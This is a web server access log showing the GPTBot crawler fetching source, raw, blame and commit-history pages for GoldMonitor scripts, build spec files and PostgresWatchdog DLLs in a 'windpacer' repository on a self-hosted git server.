"/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:14:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 9875] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:14:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 12330] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:14:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 11584] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:14:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:14:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 22150] [Gzip 11.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:14:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 11582] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:14:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:14:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 9874] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:14:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 11459] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:14:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 9864] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:14:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 12270] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10125] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" +[17/Feb/2026:14:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:14:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 150852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:14:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 12328] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 19360] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 10859] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:14:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 22296] [Gzip 11.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:14:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 18583] [Gzip 5.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 11765] [Gzip 5.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:14:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 12398] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 11405] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:14:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:14:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:14:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 12357] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:14:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py?display=source" [Client 74.7.227.38] [Length 19374] [Gzip 6.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 11459] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:14:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 9867] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:14:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 150852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:14:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 11576] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:14:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:14:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:14:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 312513] [Gzip 21.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:14:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:14:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 11488] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 20439] [Gzip 10.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 19888] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 11764] [Gzip 5.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 19068] [Gzip 9.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 20838] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 8547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:14:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 12397] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 1056898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:14:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr 